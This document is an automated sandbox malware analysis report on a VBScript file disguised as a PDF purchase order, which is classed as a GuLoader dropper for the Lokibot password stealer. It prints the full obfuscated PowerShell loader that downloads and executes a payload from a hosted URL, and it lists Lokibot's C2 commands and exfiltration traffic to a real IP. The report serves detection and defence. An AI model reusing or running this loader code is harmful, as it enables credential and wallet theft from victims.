Windows Analysis Report
SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs

Overview

General Information

Sample name: SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs
renamed because original name is a hash value
Original sample name: SOLICITUD DE PEDIDO (Universidade de São Paulo (USP))09-30-2024·pdf.vbs
Analysis ID: 1523156
MD5: 8de3bba9fb959d08b3719f1281957c56
SHA1: b8132af0e02ecb58c3c3eb39fe919e3b805106cf
SHA256: c2df6879029285a4edb1e60526812177c3ac1b7293e5b5f05d8250d682641e25
Tags: Loki, vbs, user-abuse_ch
Infos:

Detection

GuLoader, Lokibot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Lokibot
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 5876 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 5972 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Daddy Sabe Kreprven Hensttelsernes Brnesengenes Ribwort #>;$Tiberius='Forvokset';<#Tangloppers Vindroses Klassesamarbejde Atommissilernes Mngderabattens #>;$Bumblebeefishes=$host.PrivateData;If ($Bumblebeefishes) {$Driftssikrere++;}function Stratocumulus($Udtagelsens){$Variantens=$Bibliopegistical+$Udtagelsens.Length-$Driftssikrere;for( $Presningers=5;$Presningers -lt $Variantens;$Presningers+=6){$Deanne+=$Udtagelsens[$Presningers];}$Deanne;}function Romancerne($Amphiblestritis){ & ($Perijove) ($Amphiblestritis);}$Termometeret=Stratocumulus ' ,iveM GroloB uffz,ndadiMonotlb,ombl,akanaoverd/Incom5Klump.Ojibw0 Dest myelo(BrevsWAndreiGon pnTogosdSkraaoBkkenw nblisQuant .ldtaNCommeTBly n Skyde1Chefa0Bu fo. Adri0 Sand;Inrad ForeWChapliFodern Back6U.enf4 Clum; Atli DetacxEfte.6Won s4vippe;T chn El oqrProg vCopub:Fusio1,egra2U eff1 isje.Ussel0synge) ssev Out lGExpedeTrinsc annk.nrepo Prei/Inten2str.t0 asth1butti0 ,nds0Topta1themi0 Blaa1 togs Buks FLeneni Daasr ReexeUvatefGgekaoQrparxPert / Tred1Kurs.2 Bifi1 Anxi.Fleck0G obo ';$Redaktionernes=Stratocumulus 'B lfauSelv SSubmieAnkleR Mis,-skrifASnes,gDisgaeUdviknSte,etUdst, ';$Coadjuvant=Stratocumulus ' Uncoh Studt aroktVagttpStares H po:S bcl/ Rang/InevidBuglorUnconiO twavBemuze.rlle.AsbesgBrighoDepreoRdsptgprocrlSal meKej e.ArrtecVandioLabormSyre / PrinuOpistcBarse? 
DyspeCasquxBr tipEks mo lter FormtDe ik= PlacdSy,cooRaneewTilganDu,sllPlaneoEnr qaId oldCrean&UnthoiMa sedForst= Hono1 Ferr1UnbarzChondM UndezBoxcaz Weinw sinnHOrdkl9UngarHLecanUTekstCVermuNPropeKTabul5En ed3CrapaAUdslagPrepaFErasjrGtepabForbrFStemm7Py opXNonpai Are F St.inAnticf Barbq Fre.8TuberbS ubh_ to suBikin ';$Tarnal=Stratocumulus 'Abbre> Mayw ';$Perijove=Stratocumulus 'ele.tiPostoeV,jlex ddor ';$hovedmandens='Galenes';$Sabuja='\Tavell.Vrd';Romancerne (Stratocumulus 'Un er$WeekegAfspal ForeoColtsbDowsaaZon il Bla : myskLPrceduGlycek hjlpsTekstuGdni sProskvSophrrbartoeFraxilPolytsInkw,e UnrerTrucknIncive Folk= E gr$Amanie Puren BundvSupe :Tr kna SodapFictipTeachd rseaGenertMngdea Pri +Stoer$InvasSb rgeaStt.ebTieleuPterojServia ,rol ');Romancerne (Stratocumulus 'Therm$SharegcatallGrundoAmatrbdoed.a PerilSkr,a:ReignKaureanH nnra Urinl aandd ernieStrubnYogeed UdsmeFatte=R tin$SurmeC KommoDit aaLe igdAfv kj Encau SidsvSkovfaTelt,n,pkalt Hopk.Omdiss ,laepFlle lTusseiAnge.tGen e(Tide,$KopisT Can aVarslrImpasnForgaa.ystelFormu)Vurde ');Romancerne (Stratocumulus 'Amfib[loca NAndeneHokest endi. orgeS egnie Firer uadvMasseiRaviscRrlggeWagglP oninooctadi Sne nKaut tSubteM PostaPushen GascaF ikkginvole ChrorAflnn]Hrels:C bal:TilstSRegreeRagascBraveuNglefrSubeli FeattHypobySheucPLystfrOverfoNonhatKamgaoCarpecShuddostruklHirud Fl.ed=Sunga Wint[Bedk,NRhamneSkridtAsc r.zoarcSTaareeTra scSceneuKalatrW.stoielvbrtForeryOveriPAmb,vrEtymoo.yanitSodleo B ofcUnifaoCy thlKonfeT DngeyDambrpPr toeTingl]Dyb r:Pr pe: Fo.fT GstflVoldts ,all1Plad 2 sovs ');$Coadjuvant=$Knaldende[0];$Manius=(Stratocumulus 'Teena$ ind gIn ralIrrelOp.escB He mA EtioLJuece:R sikr Op aeTilluvVejskiCreagS BodeoColporIchthS Forl=UrtesnThefteChr mw Impu-S.ussoSlattbchookjUnderEHeretCSpidst all AgorsNon,rySpiseSRetirtCatchEAgnelmFilm,.AselanDutteeFo sttA tik. 
vampWSuperE BaghB KondCC nniLtele I TrkneI dkbnH perT Pelu ');Romancerne ($Manius);Romancerne (Stratocumulus ' angb$DimenR PrioeSigvav OptaiOpiops CitrobundprMachisUnfra.TekstH FlareRadiaaBrod.dV.rtueSeptorRotansMonst[Torso$FortaRSubtreDiscadAntiaaEncork UgektgrammiAdmonoAntednInte eNskesr SkarnPauseeudjaesEnam.]Ronni=omkla$ Me lTColore ivinrTor,hmFormioReak.mPro oeToba tNataleEtmaarGunl,e AmphtLap o ');$Controvert=Stratocumulus ' Nont$UnfriRMilite InstvRe,triO erssdext oDataerChangsReent.AnkylDTils oBrikewSilvan verhlFemteoBiparaSibildArb,jF U dei BflelWakekezooma(odont$StrknCVilfroBranda SkoldPreofjSpex u ikrv edlgan nignBissatl,sti,Frigi$DeviaaV.rboc.iltmo uperl Staao Dds gDull,yUtilb)Contr ';$acology=$Luksusvrelserne;Romancerne (Stratocumulus ' Aiga$StenvG PerclBesmioHder,BOp inA,nowcLSed m: FortpSme,trTeetiElungys T maCSkol,o,osprUIldsltCo fl=Vind (FernytPanorESkabmsC.elatAfdra-Lion pCorecaShtgoTNsk.rH Fe r este$Dro ea Anthc EgenO Pr,dlDestrOCove g HjneYTillb)C art ');while (!$prescout) {Romancerne (Stratocumulus 'Exsec$GobligJordtlSpec oPrincbCons aNyttelFrdse:Unkn kHyperoReg rm Di tpDolmaoTzolkn isbeeUnd rrLychee upersSwobb=wissi$LimintTill r OutsuAktioedivis ') ;Romancerne $Controvert;Romancerne (Stratocumulus 'pikemSReacttUr oma HandrBav etK,age- .tenSCachilCurbseSem.peuppilpFinge nexa4 Bota ');Romancerne (Stratocumulus 'Svars$Sud eg cephlG.aato HanebSa,meaSc.tul Frem:TraumpTablorHa mleFragmsDraw cHelseoUnferuRedcotMidda=Givab(,amplTN,nemeScytosKlaustImmor- P roP BuffaKommutUnpr,hUnsol Skum$QuickaNotomcP denoSynnvlst,ejohovedgDistoyArkip)Hand ') ;Romancerne (Stratocumulus 'Bugal$UudtmgBattllHindeo Ardub Ti laBoxinlTa kl:GrundRFyrr y S jutGritttSte,deE near Kvins UtchkSlaaeeInte sMidga= skad$Bort g By.tlSnur o Svagb.adroa jugulEx er:AandsFFloateAst,olOtocrtmanwiaGebrdrGruttbKomple H stjLapard phoveUncrar Magnn iffeeHel rs Meds+Falds+Tvege%Fejlr$havf KSchilnNarcoa nhealG vnldUnd reTond nShee,dRombeeKlokk. 
FramcT,lbao GraduR tatnAltastT ebo ') ;$Coadjuvant=$Knaldende[$Rytterskes];}$Woodlike=315055;$Bullwhack=31145;Romancerne (Stratocumulus ' Arre$CivilgQu lmlNonaroDrvblbArgota NicklDiato: CuddAResu aorbicbAc.ydnBlom i avyan redegUdf rsSyersdSl.vaaSkrupgVan,d Blind=Start JudypGKropsePerchtSyste-AmatoCLserfodriftnVo attDokkeeFo esnUafhnt Der A ilp$k nciaM talc MilioStraalKlageoHv.ragR,matyOvalt ');Romancerne (Stratocumulus 'Gemm $Magtsg ZigslE ecto BinobBlankaOver.l Admi:Sw,atRAfdriaDiscobGuardbSupe a urbunDek t Decen=Skovp nonco[XanthSTaiveyIndh sMag htMaskieM rphmScle . WaltCLystbo precnfrekvvGn ereSkolerUn.nstSagos].atte: Lo r: ForuF RetorSymbio DiscmintenBTho aaIncitsAfskyeHj.le6 Fris4Apo oSVi kstOve arManiciT stynElg,agIdent(Glaym$ProblA KaldaWars.b gglonCam,yiG,mminTilkogMaks sProtodN onfafo,hagOpsam)Dag e ');Romancerne (Stratocumulus ' airl$indkbgdiskulForfaounad b VskeaP.irelBon e:TidstVRefuta,lamenSkr.edbesvir RenseEnebonGymnadictereAdlum Recru=Musik Mucig[PruhbSDomsmyD censudelitWes ee HypsmSprog.KanceTIn bre Bengxna retRocke.InspiEMas,onFeedhcKly.koCarl,d S ori.nducn Hydrg B,mb]apach: peci:BardoA altrSNo seCUnencI,nfreIMungu. StruGLotife ,dedtElastSC eput Pro.rBesl iCen rnBlkhag arkk(Teist$ KimeR St aa enaebPattebUdgyda ArabnC.amo)ducki ');Romancerne (Stratocumulus 'Irkes$gldelgPla,dlDi,keolipizb Pha,aMidcalHypop:Pu poBFlyveoSoo lnEncykdTytteaosh obToteslF.rsyeTooth=Pr,gr$pls.bVBeda aB lignSu,dod CacorAsiateNightnMelandFlu reTi,ae.Sve,ssDevilu.innabBaadvsS ndit Strmr,elefiSkuepn GodkgElint(Upwro$C aisW DisaoE,plaosuperd planl BasiiParrok ommesub o, fami$EkvilBPast u FletlUnreslKultuwD.mmeh AftoaFu,iocSkadekDiddy)Tugte ');Romancerne $Bondable;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 5588 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" followed by the same obfuscated script as PID 5972 above MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 2584 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Loki Password Stealer (PWS), LokiBot
Description:
"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMe

  • Loki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.
  • Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.
  • The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.
  • Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.
  • There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:

FILE EXTENSION | FILE DESCRIPTION
.exe | A copy of the malware that will execute every time the user account is logged into
.lck | A lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts
.hdb | A database of hashes for data that has already been exfiltrated to the C2 server
.kdb | A database of keylogger data that has yet to be sent to the C2 server

  • If the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.
  • The first packet transmitted by Loki-Bot contains application data.
  • The second packet transmitted by Loki-Bot contains decrypted Windows credentials.
  • The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.
  • Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.
  • The first WORD of the HTTP Payload represents the Loki-Bot version.
  • The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:

BYTE | PAYLOAD TYPE
0x26 | Stolen Cryptocurrency Wallet
0x27 | Stolen Application Data
0x28 | Get C2 Commands from C2 Server
0x29 | Stolen File
0x2A | POS (Point of Sale?)
0x2B | Keylogger Data
0x2C | Screenshot

  • The 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!
  • Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.
  • The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot's C2 infrastructure.
  • Loki-Bot can accept the following instructions from the C2 Server:

BYTE | INSTRUCTION DESCRIPTION
0x00 | Download EXE & Execute
0x01 | Download DLL & Load #1
0x02 | Download DLL & Load #2
0x08 | Delete HDB File
0x09 | Start Keylogger
0x0A | Mine & Steal Data
0x0E | Exit Loki-Bot
0x0F | Upgrade Loki-Bot
0x10 | Change C2 Polling Frequency
0x11 | Delete Executables & Exit

Suricata Signatures

RULE SID | RULE NAME
2024311 | ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected
2024312 | ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1
2024313 | ET TROJAN Loki Bot Request for C2 Commands Detected M1
2024314 | ET TROJAN Loki Bot File Exfiltration Detected
2024315 | ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1
2024316 | ET TROJAN Loki Bot Screenshot Exfiltration Detected
2024317 | ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2
2024318 | ET TROJAN Loki Bot Request for C2 Commands Detected M2
2024319 | ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2

Attribution:
  • SWEED
  • The Gorgon Group
  • Cobalt
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
No configs have been found
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security

Source | Rule | Description | Author | Strings
00000005.00000002.3056701550.00000000083B0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000007.00000002.3324895722.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security
00000005.00000002.3043556156.0000000005624000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
00000005.00000002.3057467096.0000000009F62000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
00000002.00000002.2273173018.00000297E5ADD000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security

Source | Rule | Description | Author | Strings
amsi64_5972.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
amsi32_5588.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
                • 0xc6eb:$b2: ::FromBase64String(
                • 0xb77c:$s1: -join
                • 0x4f28:$s4: +=
                • 0x4fea:$s4: +=
                • 0x9211:$s4: +=
                • 0xb32e:$s4: +=
                • 0xb618:$s4: +=
                • 0xb75e:$s4: +=
                • 0x15a53:$s4: +=
                • 0x15ad3:$s4: +=
                • 0x15b99:$s4: +=
                • 0x15c19:$s4: +=
                • 0x15def:$s4: +=
                • 0x15e73:$s4: +=
                • 0xbf97:$e4: Get-WmiObject
                • 0xc186:$e4: Get-Process
                • 0xc1de:$e4: Start-Process
                • 0x166bf:$e4: Get-Process

System Summary

Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs", ProcessId: 5876, ProcessName: wscript.exe
Source: Network Connection, Author: frack113, Data: DestinationIp: 142.250.184.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 2584, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49714
Source: Process started, Author: Michael Haag, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOLICITUD DE PEDIDO (Universidade de S#U00e3o Paulo (USP))09-30-2024#U00b7pdf.vbs", ProcessId: 5876, ProcessName: wscript.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" followed by the obfuscated script shown for PID 5972 in the process tree (cut off in this entry)
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-01T07:43:37.245797+0200 | 2024312 | 1 | A Network Trojan was detected | 192.168.2.5 | 49716 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:40.069355+0200 | 2024312 | 1 | A Network Trojan was detected | 192.168.2.5 | 49717 | 137.184.191.215 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-01T07:43:34.551355+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49716 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:37.322517+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49717 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:40.185853+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49718 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:43.003130+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49719 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:45.741448+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49720 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:48.572785+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49721 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:51.351558+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49723 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:54.132906+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49724 | 137.184.191.215 | 80 | TCP
2024-10-01T07:43:57.879403+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49725 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:00.649720+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49726 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:03.369738+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49727 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:06.239645+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49728 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:09.041359+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49729 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:11.889231+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49731 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:15.693620+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49732 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:18.475108+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49733 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:21.209924+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49734 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:23.931600+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49735 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:26.709116+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49736 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:29.403730+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49737 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:32.156332+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49738 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:34.894944+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49739 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:37.656693+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49740 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:40.680871+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49741 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:43.545598+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49742 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:46.240169+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49743 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:48.957161+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49744 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:51.716387+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49745 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:54.419846+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49746 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:57.163238+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49747 | 137.184.191.215 | 80 | TCP
2024-10-01T07:44:59.847504+0200 | 2025381 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49748 | 137.184.191.215 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-10-01T07:43:42.828237+020020243131Malware Command and Control Activity Detected192.168.2.549718137.184.191.21580TCP
                2024-10-01T07:43:45.589348+020020243131Malware Command and Control Activity Detected192.168.2.549719137.184.191.21580TCP
                2024-10-01T07:43:48.330751+020020243131Malware Command and Control Activity Detected192.168.2.549720137.184.191.21580TCP
                2024-10-01T07:43:51.195415+020020243131Malware Command and Control Activity Detected192.168.2.549721137.184.191.21580TCP
                2024-10-01T07:43:53.977861+020020243131Malware Command and Control Activity Detected192.168.2.549723137.184.191.21580TCP
                2024-10-01T07:43:57.727197+020020243131Malware Command and Control Activity Detected192.168.2.549724137.184.191.21580TCP
                2024-10-01T07:44:00.486167+020020243131Malware Command and Control Activity Detected192.168.2.549725137.184.191.21580TCP
                2024-10-01T07:44:03.214345+020020243131Malware Command and Control Activity Detected192.168.2.549726137.184.191.21580TCP
                2024-10-01T07:44:06.087551+020020243131Malware Command and Control Activity Detected192.168.2.549727137.184.191.21580TCP
                2024-10-01T07:44:08.879359+020020243131Malware Command and Control Activity Detected192.168.2.549728137.184.191.21580TCP
                2024-10-01T07:44:11.705337+020020243131Malware Command and Control Activity Detected192.168.2.549729137.184.191.21580TCP
                2024-10-01T07:44:15.545751+020020243131Malware Command and Control Activity Detected192.168.2.549731137.184.191.21580TCP
                2024-10-01T07:44:18.317194+020020243131Malware Command and Control Activity Detected192.168.2.549732137.184.191.21580TCP
                2024-10-01T07:44:21.054335+020020243131Malware Command and Control Activity Detected192.168.2.549733137.184.191.21580TCP
                2024-10-01T07:44:23.780395+020020243131Malware Command and Control Activity Detected192.168.2.549734137.184.191.21580TCP
                2024-10-01T07:44:26.561735+020020243131Malware Command and Control Activity Detected192.168.2.549735137.184.191.21580TCP
                2024-10-01T07:44:29.245863+020020243131Malware Command and Control Activity Detected192.168.2.549736137.184.191.21580TCP
                2024-10-01T07:44:31.998664+020020243131Malware Command and Control Activity Detected192.168.2.549737137.184.191.21580TCP
                2024-10-01T07:44:34.719619+020020243131Malware Command and Control Activity Detected192.168.2.549738137.184.191.21580TCP
                2024-10-01T07:44:37.488199+020020243131Malware Command and Control Activity Detected192.168.2.549739137.184.191.21580TCP
                2024-10-01T07:44:40.272417+020020243131Malware Command and Control Activity Detected192.168.2.549740137.184.191.21580TCP
                2024-10-01T07:44:43.361554+020020243131Malware Command and Control Activity Detected192.168.2.549741137.184.191.21580TCP
                2024-10-01T07:44:46.086297+020020243131Malware Command and Control Activity Detected192.168.2.549742137.184.191.21580TCP
                2024-10-01T07:44:48.810480+020020243131Malware Command and Control Activity Detected192.168.2.549743137.184.191.21580TCP
                2024-10-01T07:44:51.554232+020020243131Malware Command and Control Activity Detected192.168.2.549744137.184.191.21580TCP
                2024-10-01T07:44:54.256457+020020243131Malware Command and Control Activity Detected192.168.2.549745137.184.191.21580TCP
                2024-10-01T07:44:57.002316+020020243131Malware Command and Control Activity Detected192.168.2.549746137.184.191.21580TCP
                2024-10-01T07:44:59.702074+020020243131Malware Command and Control Activity Detected192.168.2.549747137.184.191.21580TCP
                2024-10-01T07:45:02.415633+020020243131Malware Command and Control Activity Detected192.168.2.549748137.184.191.21580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-01T07:43:42.828237+020020243181Malware Command and Control Activity Detected192.168.2.549718137.184.191.21580TCP
                2024-10-01T07:43:45.589348+020020243181Malware Command and Control Activity Detected192.168.2.549719137.184.191.21580TCP
                2024-10-01T07:43:48.330751+020020243181Malware Command and Control Activity Detected192.168.2.549720137.184.191.21580TCP
                2024-10-01T07:43:51.195415+020020243181Malware Command and Control Activity Detected192.168.2.549721137.184.191.21580TCP
                2024-10-01T07:43:53.977861+020020243181Malware Command and Control Activity Detected192.168.2.549723137.184.191.21580TCP
                2024-10-01T07:43:57.727197+020020243181Malware Command and Control Activity Detected192.168.2.549724137.184.191.21580TCP
